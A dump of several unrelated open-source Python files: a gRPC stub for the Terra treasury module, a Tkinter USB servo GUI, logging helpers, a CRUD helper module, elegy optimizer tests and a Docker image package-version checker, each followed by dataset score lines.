List["___cosmos_base_v1_beta1__.Coin"] = betterproto.message_field(5) epoch_initial_issuance: List[ "___cosmos_base_v1_beta1__.Coin" ] = betterproto.message_field(6) epoch_states: List["EpochState"] = betterproto.message_field(7) @dataclass(eq=False, repr=False) class TaxCap(betterproto.Message): """TaxCap is the max tax amount can be charged for the given denom""" denom: str = betterproto.string_field(1) tax_cap: str = betterproto.string_field(2) @dataclass(eq=False, repr=False) class EpochState(betterproto.Message): """EpochState is the record for each epoch state""" epoch: int = betterproto.uint64_field(1) tax_reward: str = betterproto.string_field(2) seigniorage_reward: str = betterproto.string_field(3) total_staked_luna: str = betterproto.string_field(4) class QueryStub(betterproto.ServiceStub): async def tax_rate(self) -> "QueryTaxRateResponse": request = QueryTaxRateRequest() return await self._unary_unary( "/terra.treasury.v1beta1.Query/TaxRate", request, QueryTaxRateResponse ) async def tax_cap(self, *, denom: str = "") -> "QueryTaxCapResponse": request = QueryTaxCapRequest() request.denom = denom return await self._unary_unary( "/terra.treasury.v1beta1.Query/TaxCap", request, QueryTaxCapResponse ) async def tax_caps(self) -> "QueryTaxCapsResponse": request = QueryTaxCapsRequest() return await self._unary_unary( "/terra.treasury.v1beta1.Query/TaxCaps", request, QueryTaxCapsResponse ) async def reward_weight(self) -> "QueryRewardWeightResponse": request = QueryRewardWeightRequest() return await self._unary_unary( "/terra.treasury.v1beta1.Query/RewardWeight", request, QueryRewardWeightResponse, ) async def seigniorage_proceeds(self) -> "QuerySeigniorageProceedsResponse": request = QuerySeigniorageProceedsRequest() return await self._unary_unary( "/terra.treasury.v1beta1.Query/SeigniorageProceeds", request, QuerySeigniorageProceedsResponse, ) async def tax_proceeds(self) -> "QueryTaxProceedsResponse": request = QueryTaxProceedsRequest() return await self._unary_unary( "/terra.treasury.v1beta1.Query/TaxProceeds", request, QueryTaxProceedsResponse, ) async def indicators(self) -> "QueryIndicatorsResponse": request = QueryIndicatorsRequest() return await self._unary_unary( "/terra.treasury.v1beta1.Query/Indicators", request, QueryIndicatorsResponse ) async def params(self) -> "QueryParamsResponse": request = QueryParamsRequest() return await self._unary_unary( "/terra.treasury.v1beta1.Query/Params", request, QueryParamsResponse ) class QueryBase(ServiceBase): async def tax_rate(self) -> "QueryTaxRateResponse": raise grpclib.GRPCError(grpclib.const.Status.UNIMPLEMENTED) async def tax_cap(self, denom: str) -> "QueryTaxCapResponse": raise grpclib.GRPCError(grpclib.const.Status.UNIMPLEMENTED) async def tax_caps(self) -> "QueryTaxCapsResponse": raise grpclib.GRPCError(grpclib.const.Status.UNIMPLEMENTED) async def reward_weight(self) -> "QueryRewardWeightResponse": raise grpclib.GRPCError(grpclib.const.Status.UNIMPLEMENTED) async def seigniorage_proceeds(self) -> "QuerySeigniorageProceedsResponse": raise grpclib.GRPCError(grpclib.const.Status.UNIMPLEMENTED) async def tax_proceeds(self) -> "QueryTaxProceedsResponse": raise grpclib.GRPCError(grpclib.const.Status.UNIMPLEMENTED) async def indicators(self) -> "QueryIndicatorsResponse": raise grpclib.GRPCError(grpclib.const.Status.UNIMPLEMENTED) async def params(self) -> "QueryParamsResponse": raise grpclib.GRPCError(grpclib.const.Status.UNIMPLEMENTED) async def __rpc_tax_rate(self, stream: grpclib.server.Stream) -> None: request = await stream.recv_message() request_kwargs = {} response = await self.tax_rate(**request_kwargs) await stream.send_message(response) async def __rpc_tax_cap(self, stream: grpclib.server.Stream) -> None: request = await stream.recv_message() request_kwargs = { "denom": request.denom, } response = await self.tax_cap(**request_kwargs) await stream.send_message(response) async def __rpc_tax_caps(self, stream: grpclib.server.Stream) -> None: request = await stream.recv_message() request_kwargs = {} response = await self.tax_caps(**request_kwargs) await stream.send_message(response) async def __rpc_reward_weight(self, stream: grpclib.server.Stream) -> None: request = await stream.recv_message() request_kwargs = {} response = await self.reward_weight(**request_kwargs) await stream.send_message(response) async def __rpc_seigniorage_proceeds(self, stream: grpclib.server.Stream) -> None: request = await stream.recv_message() request_kwargs = {} response = await self.seigniorage_proceeds(**request_kwargs) await stream.send_message(response) async def __rpc_tax_proceeds(self, stream: grpclib.server.Stream) -> None: request = await stream.recv_message() request_kwargs = {} response = await self.tax_proceeds(**request_kwargs) await stream.send_message(response) async def __rpc_indicators(self, stream: grpclib.server.Stream) -> None: request = await stream.recv_message() request_kwargs = {} response = await self.indicators(**request_kwargs) await stream.send_message(response) async def __rpc_params(self, stream: grpclib.server.Stream) -> None: request = await stream.recv_message() request_kwargs = {} response = await self.params(**request_kwargs) await stream.send_message(response) def __mapping__(self) -> Dict[str, grpclib.const.Handler]: return { "/terra.treasury.v1beta1.Query/TaxRate": grpclib.const.Handler( self.__rpc_tax_rate, grpclib.const.Cardinality.UNARY_UNARY, QueryTaxRateRequest, QueryTaxRateResponse, ), "/terra.treasury.v1beta1.Query/TaxCap": grpclib.const.Handler( self.__rpc_tax_cap, grpclib.const.Cardinality.UNARY_UNARY, QueryTaxCapRequest, QueryTaxCapResponse, ), "/terra.treasury.v1beta1.Query/TaxCaps": grpclib.const.Handler( self.__rpc_tax_caps, grpclib.const.Cardinality.UNARY_UNARY, QueryTaxCapsRequest, QueryTaxCapsResponse, ), "/terra.treasury.v1beta1.Query/RewardWeight": grpclib.const.Handler( self.__rpc_reward_weight, grpclib.const.Cardinality.UNARY_UNARY, QueryRewardWeightRequest, QueryRewardWeightResponse, ), "/terra.treasury.v1beta1.Query/SeigniorageProceeds": grpclib.const.Handler( self.__rpc_seigniorage_proceeds, grpclib.const.Cardinality.UNARY_UNARY, QuerySeigniorageProceedsRequest, QuerySeigniorageProceedsResponse, ), "/terra.treasury.v1beta1.Query/TaxProceeds": grpclib.const.Handler( self.__rpc_tax_proceeds, grpclib.const.Cardinality.UNARY_UNARY, QueryTaxProceedsRequest, QueryTaxProceedsResponse, ), "/terra.treasury.v1beta1.Query/Indicators": grpclib.const.Handler( self.__rpc_indicators, grpclib.const.Cardinality.UNARY_UNARY, QueryIndicatorsRequest, QueryIndicatorsResponse, ), "/terra.treasury.v1beta1.Query/Params": grpclib.const.Handler( self.__rpc_params, grpclib.const.Cardinality.UNARY_UNARY, QueryParamsRequest, QueryParamsResponse, ), } from ....cosmos.base import v1beta1 as ___cosmos_base_v1_beta1__
1.609375
2
usbservo/usbservogui.py
ppfenninger/screwball
0
11890
<reponame>ppfenninger/screwball # ## Copyright (c) 2018, <NAME> ## All rights reserved. ## ## Redistribution and use in source and binary forms, with or without ## modification, are permitted provided that the following conditions are met: ## ## 1. Redistributions of source code must retain the above copyright ## notice, this list of conditions and the following disclaimer. ## 2. Redistributions in binary form must reproduce the above copyright ## notice, this list of conditions and the following disclaimer in the ## documentation and/or other materials provided with the distribution. ## ## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" ## AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE ## IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ## ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE ## LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR ## CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF ## SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS ## INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN ## CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ## ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE ## POSSIBILITY OF SUCH DAMAGE. # import Tkinter as tk import usbservo class usbservogui: def __init__(self): self.dev = usbservo.usbservo() if self.dev.dev >= 0: self.update_job = None self.root = tk.Tk() self.root.title('USB Servo GUI') self.root.protocol('WM_DELETE_WINDOW', self.shut_down) fm = tk.Frame(self.root) tk.Button(fm, text = 'LED1', command = self.dev.toggle_led1).pack(side = tk.LEFT) tk.Button(fm, text = 'LED2', command = self.dev.toggle_led2).pack(side = tk.LEFT) tk.Button(fm, text = 'LED3', command = self.dev.toggle_led3).pack(side = tk.LEFT) fm.pack(side = tk.TOP) servo1_slider = tk.Scale(self.root, from_ = 0, to = 65535, orient = tk.HORIZONTAL, showvalue = tk.FALSE, command = self.set_servo1_callback) servo1_slider.set(32768) servo1_slider.pack(side = tk.TOP) servo2_slider = tk.Scale(self.root, from_ = 0, to = 65535, orient = tk.HORIZONTAL, showvalue = tk.FALSE, command = self.set_servo2_callback) servo2_slider.set(32768) servo2_slider.pack(side = tk.TOP) servo3_slider = tk.Scale(self.root, from_ = 0, to = 65535, orient = tk.HORIZONTAL, showvalue = tk.FALSE, command = self.set_servo3_callback) servo3_slider.set(32768) servo3_slider.pack(side = tk.TOP) servo4_slider = tk.Scale(self.root, from_ = 0, to = 65535, orient = tk.HORIZONTAL, showvalue = tk.FALSE, command = self.set_servo4_callback) servo4_slider.set(32768) servo4_slider.pack(side = tk.TOP) servo5_slider = tk.Scale(self.root, from_ = 0, to = 65535, orient = tk.HORIZONTAL, showvalue = tk.FALSE, command = self.set_servo5_callback) servo5_slider.set(32768) servo5_slider.pack(side = tk.TOP) self.sw1_status = tk.Label(self.root, text = 'SW1 is currently ?') self.sw1_status.pack(side = tk.TOP) self.sw2_status = tk.Label(self.root, text = 'SW2 is currently ?') self.sw2_status.pack(side = tk.TOP) self.sw3_status = tk.Label(self.root, text = 'SW3 is currently ?') self.sw3_status.pack(side = tk.TOP) self.a0_status = tk.Label(self.root, text = 'A0 is currently ????') self.a0_status.pack(side = tk.TOP) self.update_status() def set_servo1_callback(self, value): self.dev.set_servo1(int(value)) def set_servo2_callback(self, value): self.dev.set_servo2(int(value)) def set_servo3_callback(self, value): self.dev.set_servo3(int(value)) def set_servo4_callback(self, value): self.dev.set_servo4(int(value)) def set_servo5_callback(self, value): self.dev.set_servo5(int(value)) def update_status(self): curr_a0 = self.dev.read_a0() self.sw1_status.configure(text = 'SW1 is currently {!s}'.format(self.dev.read_sw1())) self.sw2_status.configure(text = 'SW2 is currently {!s}'.format(self.dev.read_sw2())) self.sw3_status.configure(text = 'SW3 is currently {!s}'.format(self.dev.read_sw3())) if curr_a0 is not None: self.a0_status.configure(text = 'A0 is currently {:04d}'.format(curr_a0)) self.update_job = self.root.after(50, self.update_status) def shut_down(self): self.root.after_cancel(self.update_job) self.root.destroy() self.dev.close() if __name__=='__main__': gui = usbservogui() gui.root.mainloop()
1.851563
2
GasBotty/models/utils.py
GreenCUBIC/GasBotty
353
11891
<reponame>GreenCUBIC/GasBotty try: from torch.hub import load_state_dict_from_url except ImportError: from torch.utils.model_zoo import load_url as load_state_dict_from_url
1.53125
2
pyzayo/svcinv_mixin.py
jeremyschulman/pyzayo
1
11892
<filename>pyzayo/svcinv_mixin.py """ This file contains the Zayo Service Inventory related API endpoints. References ---------- Docs http://172.16.17.32/wp-content/uploads/2020/02/Service-Inventory-Wiki.pdf """ # ----------------------------------------------------------------------------- # System Imports # ----------------------------------------------------------------------------- from typing import List, Dict # ----------------------------------------------------------------------------- # Public Imports # ----------------------------------------------------------------------------- from first import first # ----------------------------------------------------------------------------- # Private Imports # ----------------------------------------------------------------------------- from pyzayo.base_client import ZayoClientBase from pyzayo.consts import ZAYO_SM_ROUTE_SERVICES # ----------------------------------------------------------------------------- # Module Exports # ----------------------------------------------------------------------------- __all__ = ["ZayoServiceInventoryMixin"] class ZayoServiceInventoryMixin(ZayoClientBase): """ Supports the Service-Inventory API endpoints """ def get_services(self, **params) -> List[Dict]: """ Retrieve the service-inventory records given the `params` criterial or all. Other Parameters ---------------- key-value options as defined by the "existing-services" API endpoint. The `filter` parameter, for example, supports the following API record fields: * status * productGroup * productCatagory * product * term """ return self.paginate_records(url=ZAYO_SM_ROUTE_SERVICES, **params) def get_service_by_circuit_id(self, by_circuit_id: str, **params): """ Locate the service associated with the given ciruid ID. Parameters ---------- by_circuit_id: str The circuit ID string value Other Parameters ---------------- Same as get_services() method, see for details. Returns ------- The service record in dict form from API. """ return first( rec for rec in self.paginate_records(url=ZAYO_SM_ROUTE_SERVICES, **params) if rec["components"][0]["circuitId"] == by_circuit_id )
1.445313
1
pychron/core/helpers/logger_setup.py
aelamspychron/pychron
1
11893
<reponame>aelamspychron/pychron<gh_stars>1-10 # =============================================================================== # Copyright 2011 <NAME> # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # =============================================================================== # =============enthought library imports======================= # =============standard library imports ======================== from __future__ import absolute_import import logging import os import shutil from logging.handlers import RotatingFileHandler from pychron.core.helpers.filetools import list_directory, unique_path2 from pychron.paths import paths NAME_WIDTH = 40 gFORMAT = '%(name)-{}s: %(asctime)s %(levelname)-9s (%(threadName)-10s) %(message)s'.format(NAME_WIDTH) gLEVEL = logging.DEBUG def simple_logger(name): logger = logging.getLogger(name) logger.setLevel(logging.DEBUG) h = logging.StreamHandler() h.setFormatter(logging.Formatter(gFORMAT)) logger.addHandler(h) return logger def get_log_text(n): root = logging.getLogger() for h in root.handlers: if isinstance(h, RotatingFileHandler): with open(h.baseFilename, 'rb') as rfile: return tail(rfile, n) def tail(f, lines=20): """ http://stackoverflow.com/questions/136168/get-last-n-lines-of-a-file-with-python-similar-to-tail """ total_lines_wanted = lines BLOCK_SIZE = 1024 f.seek(0, 2) block_end_byte = f.tell() lines_to_go = total_lines_wanted block_number = -1 blocks = [] # blocks of size BLOCK_SIZE, in reverse order starting # from the end of the file while lines_to_go > 0 and block_end_byte > 0: if block_end_byte - BLOCK_SIZE > 0: # read the last block we haven't yet read f.seek(block_number * BLOCK_SIZE, 2) blocks.append(f.read(BLOCK_SIZE)) else: # file too small, start from begining f.seek(0, 0) # only read what was not read blocks.append(f.read(block_end_byte)) lines_found = blocks[-1].count(b'\n') lines_to_go -= lines_found block_end_byte -= BLOCK_SIZE block_number -= 1 all_read_text = b''.join(reversed(blocks)) return b'\n'.join(all_read_text.splitlines()[-total_lines_wanted:]).decode('utf-8') # def anomaly_setup(name): # ld = logging.Logger.manager.loggerDict # print 'anomaly setup ld={}'.format(ld) # if name not in ld: # bdir = paths.log_dir # name = add_extension(name, '.anomaly') # apath, _cnt = unique_path2(bdir, name, delimiter='-', extension='.log') # logger = logging.getLogger('anomalizer') # h = logging.FileHandler(apath) # logger.addHandler(h) def logging_setup(name, use_archiver=True, root=None, use_file=True, **kw): """ """ # set up deprecation warnings # import warnings # warnings.simplefilter('default') bdir = paths.log_dir if root is None else root # make sure we have a log directory # if not os.path.isdir(bdir): # os.mkdir(bdir) if use_archiver: # archive logs older than 1 month # lazy load Archive because of circular dependency from pychron.core.helpers.archiver import Archiver a = Archiver(archive_days=14, archive_months=1, root=bdir) a.clean() if use_file: # create a new logging file logname = '{}.current.log'.format(name) logpath = os.path.join(bdir, logname) if os.path.isfile(logpath): backup_logpath, _cnt = unique_path2(bdir, name, delimiter='-', extension='.log', width=5) shutil.copyfile(logpath, backup_logpath) os.remove(logpath) ps = list_directory(bdir, filtername=logname, remove_extension=False) for pi in ps: _h, t = os.path.splitext(pi) v = os.path.join(bdir, pi) shutil.copyfile(v, '{}{}'.format(backup_logpath, t)) os.remove(v) root = logging.getLogger() root.setLevel(gLEVEL) shandler = logging.StreamHandler() handlers = [shandler] if use_file: rhandler = RotatingFileHandler( logpath, maxBytes=1e7, backupCount=50) handlers.append(rhandler) fmt = logging.Formatter(gFORMAT) for hi in handlers: hi.setLevel(gLEVEL) hi.setFormatter(fmt) root.addHandler(hi) def add_root_handler(path, level=None, strformat=None, **kw): if level is None: level = gLEVEL if format is None: strformat = gFORMAT root = logging.getLogger() handler = logging.FileHandler(path, **kw) handler.setLevel(level) handler.setFormatter(logging.Formatter(strformat)) root.addHandler(handler) return handler def remove_root_handler(handler): root = logging.getLogger() root.removeHandler(handler) def new_logger(name): name = '{:<{}}'.format(name, NAME_WIDTH) l = logging.getLogger(name) l.setLevel(gLEVEL) return l def wrap(items, width=40, indent=90, delimiter=','): """ wrap a list """ if isinstance(items, str): items = items.split(delimiter) gcols = iter(items) t = 0 rs = [] r = [] while 1: try: c = next(gcols) t += 1 + len(c) if t < width: r.append(c) else: rs.append(','.join(r)) r = [c] t = len(c) except StopIteration: rs.append(','.join(r)) break return ',\n{}'.format(' ' * indent).join(rs) # ============================== EOF ===================================
1.796875
2
picmodels/models/care_advisors/case_management_models/sequence_models/services/create_update_delete.py
bbcawodu/careadvisors-backend
0
11894
<filename>picmodels/models/care_advisors/case_management_models/sequence_models/services/create_update_delete.py import picmodels def create_row_w_validated_params(cls, validated_params, rqst_errors): if 'name' not in validated_params: rqst_errors.append("'name' is a required key in the validated_params argument") return None if cls.check_for_rows_with_given_name(validated_params['name'], rqst_errors): return None row = cls() row.name = validated_params['name'] row.save() if 'add_steps' in validated_params: steps_info = validated_params['add_steps'] cmstepsforsequences_rows = [] for step_id in steps_info: cmstepsforsequences_rows.append( get_stepsforcmsequences_row_with_given_id(step_id, rqst_errors) ) if not rqst_errors: check_steps_for_given_rows_or_matching_step_number( row.steps.all(), cmstepsforsequences_rows, row, rqst_errors ) if not rqst_errors: cmstepsforsequences_rows = sorted(cmstepsforsequences_rows, key=lambda k: k.step_number) for step_row in cmstepsforsequences_rows: check_steps_for_row_with_previous_step_number(row, step_row, rqst_errors) if rqst_errors: break row.steps.add(step_row) if rqst_errors: row.delete() return None row.save() return row def update_row_w_validated_params(cls, validated_params, rqst_errors): if 'id' not in validated_params: rqst_errors.append("'id' is a required key in the validated_params argument") return None rqst_id = validated_params['id'] try: row = cls.objects.get(id=rqst_id) except cls.DoesNotExist: rqst_errors.append('Row does not exist for the id: {}'.format(rqst_id)) return None if 'add_steps' in validated_params: steps_info = validated_params['add_steps'] cmstepsforsequences_rows = [] for step_id in steps_info: cmstepsforsequences_rows.append( get_stepsforcmsequences_row_with_given_id(step_id, rqst_errors) ) if not rqst_errors: check_steps_for_given_rows_or_matching_step_number( row.steps.all(), cmstepsforsequences_rows, row, rqst_errors ) if not rqst_errors: cmstepsforsequences_rows = sorted(cmstepsforsequences_rows, key=lambda k: k.step_number) for step_row in cmstepsforsequences_rows: check_steps_for_row_with_previous_step_number(row, step_row, rqst_errors) if rqst_errors: break row.steps.add(step_row) elif 'remove_steps' in validated_params: steps_info = validated_params['remove_steps'] cmstepsforsequences_rows = [] for step_id in steps_info: cmstepsforsequences_rows.append( get_stepsforcmsequences_row_with_given_id(step_id, rqst_errors) ) if not rqst_errors: check_steps_for_not_given_rows( row.steps.all(), cmstepsforsequences_rows, row, rqst_errors ) if not rqst_errors: cmstepsforsequences_rows = sorted(cmstepsforsequences_rows, key=lambda k: k.step_number) for step_row in cmstepsforsequences_rows: row.steps.remove(step_row) if rqst_errors: return None if 'name' in validated_params: row.name = validated_params['name'] if cls.check_for_rows_with_given_name(row.name, rqst_errors, rqst_id): return None row.save() return row def delete_row_w_validated_params(cls, validated_params, rqst_errors): if 'id' not in validated_params: rqst_errors.append("'id' is a required key in the validated_params argument") return rqst_id = validated_params['id'] try: row = cls.objects.get(id=rqst_id) row.delete() except cls.DoesNotExist: rqst_errors.append('Row does not exist for the id: {!s}'.format(str(rqst_id))) def check_for_rows_with_given_name(cls, name, rqst_errors, current_id=None): found_matching_rows = False matching_rows = cls.objects.filter( name__iexact=name ) if matching_rows: found_matching_rows = True row_ids = [] len_of_row_qset = len(matching_rows) for row in matching_rows: row_ids.append(row.id) if len_of_row_qset > 1: rqst_errors.append( "Multiple rows with name: {} already exist in db. (Hint - Delete all but one and modify the remaining) id's: {}".format( name, row_ids)) else: if not current_id or current_id not in row_ids: rqst_errors.append( "Row with name: {} already exists in db. (Hint - Modify that entry) id: {}".format( name, row_ids[0])) else: found_matching_rows = False return found_matching_rows def get_stepsforcmsequences_row_with_given_id(row_id, rqst_errors): row = None if row_id: try: row = picmodels.models.StepsForCMSequences.objects.get(id=row_id) except picmodels.models.StepsForCMSequences.DoesNotExist: row = None rqst_errors.append("No StepsForCMSequences row found with id: {}".format(row_id)) return row def check_steps_for_given_rows_or_matching_step_number(cur_steps_qset, given_steps_list, row, rqst_errors): for cm_step in given_steps_list: if rqst_errors: break if cm_step in cur_steps_qset: rqst_errors.append( "cm_step with id: {} already exists in row id {}'s steps list (Hint - remove from parameter 'add_steps' list)".format( cm_step.id, row.id, ) ) else: check_steps_for_row_with_given_step_number(cur_steps_qset, cm_step, row, rqst_errors) def check_steps_for_not_given_rows(cur_steps_qset, given_steps_list, row, rqst_errors): for cm_step in given_steps_list: if cm_step not in cur_steps_qset: rqst_errors.append( "cm_step with id: {} does not exists in row id {}'s steps list (Hint - remove from parameter 'remove_stepst' list)".format( cm_step.id, row.id, ) ) def check_steps_for_row_with_given_step_number(cur_steps_qset, given_step_row, row, rqst_errors): for cm_step in cur_steps_qset: if cm_step.step_number == given_step_row.step_number: rqst_errors.append( "cm_step with id: {} has a step_number of: {}, which already exists in row id {}'s steps list (Hint - remove from parameter 'add_steps' list)".format( given_step_row.id, given_step_row.step_number, row.id, ) ) break def check_steps_for_row_with_previous_step_number(sequence_row, given_step_row, rqst_errors): previous_step_found = False current_step_number = given_step_row.step_number if current_step_number <= 1: return None previous_step_number = current_step_number - 1 for cm_step in sequence_row.steps.all(): if cm_step.step_number == previous_step_number: previous_step_found = True break if not previous_step_found: rqst_errors.append( "Sequence with id: {} does not have a step with 1 less than step row: {}'s step_number (Hint - remove from parameter 'add_steps' list)".format( sequence_row.id, given_step_row.return_values_dict(), ) )
2.109375
2
elegy/optimizer_test.py
sooheon/elegy
0
11895
import jax import elegy import unittest import numpy as np import jax.numpy as jnp import optax class MLP(elegy.Module): """Standard LeNet-300-100 MLP network.""" n1: int n2: int def __init__(self, n1: int = 3, n2: int = 4): super().__init__() self.n1 = n1 self.n2 = n2 def call(self, image: jnp.ndarray, training: bool): x = image.astype(jnp.float32) / 255.0 x = jnp.reshape(x, [x.shape[0], -1]) x = elegy.nn.Linear(self.n1)(x) x = elegy.nn.BatchNormalization()(x) x = jax.nn.relu(x) x = elegy.nn.Linear(self.n2)(x) x = jax.nn.relu(x) x = elegy.nn.Linear(10)(x) return x class OptimizerTest(unittest.TestCase): def test_optimizer(self): optax_op = optax.adam(1e-3) lr_schedule = lambda step, epoch: step / 3 optimizer = elegy.Optimizer(optax_op, lr_schedule=lr_schedule) params = np.random.uniform((3, 4)) grads = np.random.uniform((3, 4)) rng = elegy.RNGSeq(42) optimizer_states = optimizer.init(rng, params) assert jnp.allclose(optimizer.current_lr(optimizer_states), 0 / 3) params, optimizer_states = optimizer.apply(params, grads, optimizer_states, rng) assert jnp.allclose(optimizer.current_lr(optimizer_states), 1 / 3) params, optimizer_states = optimizer.apply(params, grads, optimizer_states, rng) assert jnp.allclose(optimizer.current_lr(optimizer_states), 2 / 3) params, optimizer_states = optimizer.apply(params, grads, optimizer_states, rng) assert jnp.allclose(optimizer.current_lr(optimizer_states), 3 / 3) def test_optimizer_epoch(self): optax_op = optax.adam(1e-3) lr_schedule = lambda step, epoch: epoch optimizer = elegy.Optimizer( optax_op, lr_schedule=lr_schedule, steps_per_epoch=2 ) params = np.random.uniform((3, 4)) grads = np.random.uniform((3, 4)) rng = elegy.RNGSeq(42) optimizer_states = optimizer.init( rng=rng, net_params=params, ) assert jnp.allclose(optimizer.current_lr(optimizer_states), 0) params, optimizer_states = optimizer.apply(params, grads, optimizer_states, rng) assert jnp.allclose(optimizer.current_lr(optimizer_states), 0) params, optimizer_states = optimizer.apply(params, grads, optimizer_states, rng) assert jnp.allclose(optimizer.current_lr(optimizer_states), 1) params, optimizer_states = optimizer.apply(params, grads, optimizer_states, rng) assert jnp.allclose(optimizer.current_lr(optimizer_states), 1) params, optimizer_states = optimizer.apply(params, grads, optimizer_states, rng) def test_optimizer_chain(self): optimizer = elegy.Optimizer( optax.sgd(0.1), optax.clip(0.5), ) params = np.zeros(shape=(3, 4)) grads = np.ones(shape=(3, 4)) * 100_000 rng = elegy.RNGSeq(42) optimizer_states = optimizer.init( rng=rng, net_params=params, ) params, optimizer_states = optimizer.apply(params, grads, optimizer_states, rng) assert np.all(-0.5 <= params) and np.all(params <= 0.5) def test_lr_logging(self): model = elegy.Model( module=MLP(n1=3, n2=1), loss=elegy.losses.SparseCategoricalCrossentropy(from_logits=True), metrics=elegy.metrics.SparseCategoricalAccuracy(), optimizer=elegy.Optimizer( optax.adamw(1.0, b1=0.95), lr_schedule=lambda step, epoch: jnp.array(1e-3), ), run_eagerly=True, ) X = np.random.uniform(size=(5, 7, 7)) y = np.random.randint(10, size=(5,)) history = model.fit( x=X, y=y, epochs=1, steps_per_epoch=1, batch_size=5, validation_data=(X, y), shuffle=True, verbose=0, ) assert "lr" in history.history assert np.allclose(history.history["lr"], 1e-3)
2.484375
2
scripts/version.py
nfnty/docker
54
11896
<filename>scripts/version.py #!/usr/bin/python3 ''' Check image package versions ''' import argparse import distutils.version import re import subprocess from typing import Any, Dict, Sequence, Tuple import lxml.html # type: ignore import requests from termcolor import cprint from utils.image import IMAGES, path_dockerfile TIMEOUT = (31, 181) # (Connect, Read) HEADERS = {'user-agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:43.0) Gecko/20100101 Firefox/43.0'} def args_parse(arguments: Sequence[str] = None) -> argparse.Namespace: ''' Parse arguments ''' par0 = argparse.ArgumentParser(description='Image package version checker') method = par0.add_mutually_exclusive_group(required=False) method.add_argument( '--include', metavar='IMAGE', action='append', choices=IMAGES.keys(), help='Include image(s)', ) method.add_argument( '--exclude', metavar='IMAGE', action='append', choices=IMAGES.keys(), help='Exclude image(s)', ) return par0.parse_args(arguments) def fetch(url: str, timeout: Tuple[int, int]) -> Any: ''' Fetch URL ''' try: response = requests.get(url, headers=HEADERS, timeout=timeout) response.raise_for_status() except (requests.exceptions.Timeout, requests.exceptions.HTTPError) as error: raise RuntimeError('fetch: {0:s}\n{1:s}'.format(str(error), str(error.response.content))) except OSError as error: raise RuntimeError('fetch: {0:s}'.format(str(error))) return lxml.html.document_fromstring(response.content) def document_parse(document: Any, xpath: str, attribute: str, regex: str) -> distutils.version.LooseVersion: ''' xpath version extractor ''' nodes = document.xpath(xpath) if not nodes: raise RuntimeError('Incorrect xpath: No nodes') versions = [] for node in nodes: if attribute: string = node.get(attribute) elif isinstance(node, str): string = node else: string = node.text if regex: obj = re.search(regex, string, flags=(re.MULTILINE | re.DOTALL)) # pylint: disable=no-member if not obj: continue elif len(obj.groups()) > 1: raise RuntimeError('Incorrect regex: More than 1 capture group') string = obj.group(1) if not string: raise RuntimeError('Incorrect regex: Invalid capture group') versions.append(distutils.version.LooseVersion(string)) if not versions: raise RuntimeError('No matching versions') version: distutils.version.LooseVersion = sorted(versions, reverse=True)[0] if not version or not hasattr(version, 'vstring'): raise RuntimeError('Version is invalid') return version def version_scrape(url: str, xpath: str, attribute: str, regex: str) -> distutils.version.LooseVersion: ''' Scrape latest version from url ''' document = fetch(url, TIMEOUT) return document_parse(document, xpath, attribute, regex) def version_pacman(package: str) -> Dict[str, distutils.version.LooseVersion]: ''' Return dict with repository versions of package ''' try: output = subprocess.run([ '/usr/bin/expac', '--sync', '--search', '%n %r %v', r'^{0:s}$'.format(re.escape(package)), ], check=True, stdout=subprocess.PIPE).stdout.decode('UTF-8') except subprocess.CalledProcessError: raise RuntimeError('{0:s} not in any repository'.format(package)) versions: Dict[str, distutils.version.LooseVersion] = {} for line in output.splitlines(): name, repo, version = line.split() if name == package: versions[repo] = distutils.version.LooseVersion(version) return versions def dockerfile_update(path: str, variable: str, version: str) -> None: ''' Update Dockerfiles with current version ''' with open(path, 'r') as fobj: newfile, found = re.subn( r'{0:s}=\'\S*\''.format(variable), '{0:s}=\'{1:s}\''.format(variable, version), fobj.read(), ) if not found: raise ValueError('Did not find ENV variable') elif found > 1: raise ValueError('More than 1: {0:s}'.format(variable)) with open(path, 'w') as fobj: fobj.write(newfile) def main() -> None: # pylint: disable=too-many-branches ''' Main ''' subprocess.check_call(['/usr/bin/sudo', '/usr/bin/pacman', '--sync', '--refresh']) if ARGS.include: images = {image: config for image, config in IMAGES.items() if image in ARGS.include} elif ARGS.exclude: images = {image: config for image, config in IMAGES.items() if image not in ARGS.exclude} else: images = IMAGES for image, image_dict in sorted(images.items(), key=lambda item: item[0]): cprint('\n{0:s}'.format(image), 'white', attrs=['underline']) if 'Check' in image_dict and not image_dict['Check']: print('Not checked!') continue if 'Packages' not in image_dict: print('No packages!') continue for package, package_dict in image_dict['Packages'].items(): cprint('{0:s}:'.format(package), 'yellow') for source, source_dict in package_dict['Sources'].items(): try: source_dict['Version'] = version_scrape( source_dict['URL'], source_dict['XPath'], source_dict['Attribute'] if 'Attribute' in source_dict else None, source_dict['Regex'] if 'Regex' in source_dict else None, ) except RuntimeError as error: cprint('{0:s}: {1:s}'.format(source, str(error)), 'red') source_dict['Version'] = None try: for repo, version in version_pacman(package).items(): package_dict['Sources'][repo] = {'Version': version} except RuntimeError as error: cprint(str(error), 'red') for source, source_dict in package_dict['Sources'].items(): print('{0:15s}{1:s}'.format( source, source_dict['Version'].vstring if source_dict['Version'] else 'None', )) if not package_dict['Sources'][package_dict['Download']]['Version']: cprint('No Version for Download: {0:s}'.format( package_dict['Download']), 'red') continue dockerfile_update( path_dockerfile(image), package_dict['Variable'], 